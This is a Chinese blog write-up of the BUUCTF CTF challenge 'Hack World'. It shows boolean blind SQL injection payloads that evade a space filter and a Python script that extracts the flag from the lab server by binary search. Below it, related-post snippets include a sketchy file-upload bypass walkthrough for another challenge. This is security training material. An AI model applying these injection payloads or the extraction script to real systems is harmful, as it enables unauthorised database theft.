[CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2024-09-24 14:53:54 发布
最新推荐文章于 2024-09-24 14:53:54 发布
阅读量321 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124261648
版权

SQL注入 布尔盲注 UUID Web安全 Python脚本
关键词由CSDN通过智能技术生成

BUUCTF WEB [CISCN2019 华北赛区 Day2 Web1]Hack World

  • 提交1成功,提交字母a报错,猜测查询语句查询的是整数,外部无包裹

  • 尝试后发现空格被过滤,但select未被过滤,直接查询

    id=;select(flag)from(flag);

    回显

    bool(false)

  • 题目提示flag是uuid,尝试使用布尔盲注来猜测字符串的长度与每一位的字母

    uuid, Universally Unique Identifier,是一个长度为32位的随机字符串

  • 猜测字符串长度

    id=1^(length(select(flag)from(flag))>10)

    最后得到结果,字符串长度为42

  • 脚本

    import requests

url = 'http://fb7ec7fa-a1e4-4fdf-bc74-8d3c7a8531c3.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1, 43):
    max = 127
    min = 0
    for c in range(0, 127):
        s = (int)((max + min) / 2)
        payload = '1^(ascii(substr((select(flag)from(flag)),' + str(i) + ',1))>' + str(s) + ')'
        r = requests.post(url, data={'id': payload})
        if 'Hello, glzjin wants a girlfriend.' in str(r.content):
            max = s
        else:
            min = s
        if ((max - min) <= 1):
            flag += chr(max)
            break
print(flag)

# flag{7083f16e-3c17-4965-b34e-52b75acec4c6}
Y1Daa
关注
专栏目录
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
2302_79800344的博客
02-28 2139
【代码】[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解。
[CISCN2019 华北赛区Day2 Web1]HackWorld
最新发布
qq_45636267的博客
09-24 165
CTF的web练习
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
国赛 2019 华北赛区 Web 题目
05-19
ciscn
利用PHAR协议进行PHP反序列化攻击1
08-03
在某些网络安全竞赛(如[CISCN2019华北赛区 Day1 Web1]Dropbox)中,攻击者可能利用PHAR反序列化漏洞来实现文件读取或执行其他操作。例如,通过上传一个伪装成图片的PHAR文件,然后更改其后缀,使得PHP尝试解析它。...
2019华北电力大学全日制学士学位招生目录1
08-03
① 101 思想政治理论 ② 201 英语一 ③ 301 数学一 ④ 811 电力系统分析基础 ① 电力系统综合 ② 高电压技术 ③ 电力电子技术 ① 发电厂电
2019华北电力大学全日制专业学位招生目录1
08-03
① 101 思想政治理论 ② 204 英语二 ③ 302 数学二 ④ 811 电力系统分析基础 ① 电力系统综合 ② 电力电子技术 ③ 高电压技术 ① 发电厂电
华北电力大学高等数学期末考试题2018-2019第2学期(A).pdf
06-06
1. 向量与模长计算:考试题目中出现的“连接点(1,1,1),MA(2,2,1)”涉及的是三维空间中两点之间的向量表示,计算其模长是基础数学运算。 2. 方向导数:函数的方向导数表示函数在某一方向上的变化率,计算时需要用到...
华北科技学院计算机系计算机网络2019年期末考试复习大纲.zip
06-18
华北科技学院计算机网络课程发复习大纲,由老师给予,其中知识点由老师总结的大概,然后由自己添加完成,附含一百多道老师所给的选择题大题等
6890F1(华北工控mitx6890的亮机bios)
03-15
标题中的“6890F1(华北工控mitx6890的亮机bios)”指的是华北工控公司生产的MITX-6890主板的BIOS固件更新文件,其中“6890F1”可能是该版本BIOS的具体型号或代号。BIOS(Basic Input/Output System)是计算机硬件系统...
华北电力大学2019年毕业生就业质量年度报告.pdf
04-12
华北电力大学2019年毕业生就业质量年度报告.pdf
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 626
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 771
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的用户名和密码,但是都无法登录成功。因此,我们需要通过其他方式来获取flag。 我们可以尝试一些常见的Web漏洞,比如SQL注入、XSS等。在这个题目中,我们可以尝试一些文件上传漏洞。 我们可以通过Burp Suite等工具,来拦截网站的上传请求,然后修改上传的文件,来获取flag。 具体的操作步骤如下: 1. 使用Burp Suite等工具,拦截上传请求。 2. 修改上传的文件,将文件名改为flag.php。 3. 将上传的文件类型改为php。 4. 将上传的文件内容改为以下内容: <?php echo "flag{xxxxxxxxxxxxxxxxxxxx}"; ?> 其中,xxxxxxxxxxxxxxxxxxxx为flag的具体内容。 5. 发送修改后的上传请求,上传文件。 6. 访问上传的文件,即可获取flag。 通过以上步骤,我们就可以成功获取到flag了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值